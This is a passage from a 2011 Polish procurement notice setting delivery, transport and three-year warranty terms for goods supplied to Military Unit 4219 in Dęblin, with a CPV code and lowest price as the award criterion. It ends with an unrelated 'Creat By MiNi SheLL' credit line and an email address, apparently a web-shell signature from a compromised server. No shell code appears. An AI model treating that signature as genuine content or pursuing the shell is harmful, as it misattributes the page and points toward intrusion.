3. Wykonawca dostarczy artykuły w całości oryginalne, fabrycznie nowe, posiadające nienaruszone cechy pierwotnego produktu. 
4.Wykonawca zobowiązuje się dostarczyć wszystkie artykuły w terminie 20 dni od dnia złożenia pisemnego zamówienia, nie później niż do 30.09.2011 r.  
5. Artykuły przeznaczone dla Zamawiającego Wykonawca zobowiązuje się dostarczyć do jego siedziby, tj. Jednostka Wojskowa 4219 w Dęblinie, do wskazanego magazynu, własnym transportem lub za pośrednictwem dowolnie wybranego przewoźnika na własny koszt.
6. Z tytułu załadunku, transportu i rozładunku artykułów Wykonawcy nie przysługuje odrębne wynagrodzenie. 
7. Wykonawca na dostarczone artykuły udziela 3 - letniej gwarancji,  co nie wyklucza dłuższych gwarancji udzielanych przez producenta. Okres gwarancji liczony jest od daty odbioru przez Zamawiającego. Wszelkie koszty związane z wykonaniem obowiązków gwarancyjnych ponosi Wykonawca. Jeżeli Wykonawca wymaga szczególnego trybu zgłaszania reklamacji, to powinien określić to w kartach gwarancyjnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.14.30-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com